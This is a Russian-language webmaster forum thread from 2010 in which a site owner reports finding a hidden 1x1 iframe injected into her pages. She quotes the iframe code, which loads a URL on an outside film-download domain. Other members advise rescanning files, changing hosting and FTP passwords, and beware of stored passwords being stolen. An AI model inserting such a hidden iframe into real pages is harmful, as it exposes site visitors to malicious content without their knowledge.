WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
09 Декабрь 2016, 09:47:01 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама

5
10
15
Свежие ответы
Re: Предлагаю нескучные статьи от Ljuljak (Контент, копирайтинг, переводы)
Re: Марафон Спарта от Пузата - Почему я иду от Клим (Обучение сайтостроению, SEO и заработку)
Re: Требуется помощница по ведению сайта (контент-менеджер) от Клим (Работа и услуги)
Re: DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! от DreamSupport (Реклама и доход)
Re: Проблема с дизайнером от Елена Николаева (Дизайн)
Re: Апа не будет до конца лета? от larisay (Yandex)
Re: Хостинг FairyHosting.com от vladislavd (Хостинг)
Re: как сейчас с высококонкурентной тематикой для новых сайтов? от Ивица (Раскрутка сайтов в поисковиках)
Re: [Анонс] Букварикс: бесплатная программа для быстрого подбора ключевых слов от Bukvarix (Сервисы и SEO программы)
Re: Занимательные статьи для ваших сайтов от Лизки от Chaffinch (Ищу копирайтера, редактора, контент-менеджера)
Re: Авангард блогосферы — электронный журнал о блогосфере от jansen (Наше творчество)
Re: Как найти время заняться своими сайтами? от Natulkin (Мотивация)
Re: Качественные площадки под статьи с высокой посещаемостью и переходами по ссылкам от Igor_Molodtsov (Платное размещение статей и ссылок)
Доска объявлений версии 2.2 от Diana101 (Сайты)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Свежие темы
Показать ещё
  Печать  
Страниц: 1
Автор

Тема: Кто-то залез в мой код  (Прочитано 2381 раз)

panda

Мир вашему дому!

Просмотр профиля
« : 17 Июнь 2010, 10:35:40 »

Делаю новый сайт и поэтому потребовалось заглянуть в коды своих уже действующих сайтов. Поскольку пишу коды сама, то сразу увидела "чужого" прилипшего ко мне.

<body bgcolor="#e9e8e3" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0 <iframe src="http://zbestfilm.net/media/kal/index.php?out=1276449386" width="1" height="1" frameborder="0"></iframe>
Вот он выделенный красным. Проверила ссылку, она ведет на сайт скачивания фильмов. Обнаружила чужаков на двух сайтах. Убрала их, конечно, но волнение осталось.

Я в замешательстве! Как можно поставить свой фрейм в чужой код? Для чего это делаеться?  Злой

serg159

Просмотр профиля
« Ответ #1 : 17 Июнь 2010, 13:55:11 »

Проверьте все свои файлы на сервере на предмет вирусов, лучше закачать все файлы сайта на сервер заново. Однозначно поменяйте пароль на хостинг - делайте посложнее и не слова, а сложный набор букв. Ваш пароль просто был взломан. Если просто убрать этот вредоносный код и не поменять пароли - через недельку-другую похожий код скорее всего вернется.
panda

Мир вашему дому!

Просмотр профиля
« Ответ #2 : 17 Июнь 2010, 20:43:13 »

Вот это да! Я то думала, что убрала код и всё. А они опять могут забраться. Пойду на хост срочно менять пароль.
Спасибо за совет.  дружба навеки

J77
И создал Бог женщину. Существо получилось вредное, но забавное...

Просмотр профиля
« Ответ #3 : 17 Июнь 2010, 22:09:46 »

Если вы для закачки файлов пользуетесь фтп через винком или фар, то советую сменить пароль для фтп и не хранить его, а каждый раз вбивать заново. У меня такое было с одним сайтом, постоянно кто-то залазил в индексный файл и изменял код так, что если с поисковика идти по ссылке на мой сайт, то идет пересылка автоматом на левый сайт (который рассылал вирусы). Поверьте последствия могут быть самыми печальными Грустный Яша пометил мой сайт, как рассылающий вирусы, а Гугль вообще выкинул из индекса. Трафик упал до 3 чел в день Грустный Я постоянно меняла пароли, но это не помогало. Оказалось, что у меня на локальном компе сидит вирус, который в момент когда я сохраняю фтп соединение с новым паролем ворует его и передает "куда надо", и все повторяется заново. Помогло только полностью снести пароль и вводить заново каждый раз. С Яндексом отношения восстановила, а вот с Гуглом уже 3 месяца не могу Грустный Так что осторожнее с этим делом.

Краткий план на 2015-16 год: Родить, заработать, переехать.....
Я очень быстро составляю СЯ . А вы?
Anton
« Ответ #4 : 17 Июнь 2010, 22:17:27 »

девушки, вы в курсе, что ftp пароли передаются по сети открытым текстом и если вы их передаете по wifi или в пределах одной сети, то их можно просто прочитать....
panda

Мир вашему дому!

Просмотр профиля
« Ответ #5 : 18 Июнь 2010, 13:19:12 »

Для заливки на сервер пользуюсь Тотал Коммандер. Сменила пароль на хостинге. Перезалила страницы. Теперь периодически буду наблюдать когда враг проникнет на мою территорию Чувствую себя уже как на линии фронта. Только и поглядывай, то статьи украдут, то в дом влезут.
Если кому нужна ссылка на бесплатную чистку компа от вируса пишите в личку.  негритоска

Маруся

Просмотр профиля
« Ответ #6 : 23 Июнь 2010, 22:55:18 »

У меня никто ничего не ворует, пользуюсь файл зила уже год, правда была сначала когда совсем чайник, пароли простые очень делала, в мой код фигню какую то вшили, ее нашла, почистила авастом папку с сайтами скинутую на рабочий стол и все, проблема завершилась и не повторялась ттт...

Девочки!!!2 сайта переношу на новые домены, ссылки ваши все будут, с кем менялась!! Только на мои сайты теперь ссылки будут другие((
mara51

Просмотр профиля WWW
« Ответ #7 : 27 Июнь 2010, 10:08:21 »

Для заливки на сервер пользуюсь Тотал Коммандер. Сменила пароль на хостинге. Перезалила страницы. Теперь периодически буду наблюдать когда враг проникнет на мою территорию Чувствую себя уже как на линии фронта. Только и поглядывай, то статьи украдут, то в дом влезут.
Если кому нужна ссылка на бесплатную чистку компа от вируса пишите в личку.  негритоска
Я тоже пользуюсь Тотал Коммандер, так что почитайте про мой случай, что сделал на моем блоге.

Страниц: 1
  Печать  

Перейти в:  

| Sitemap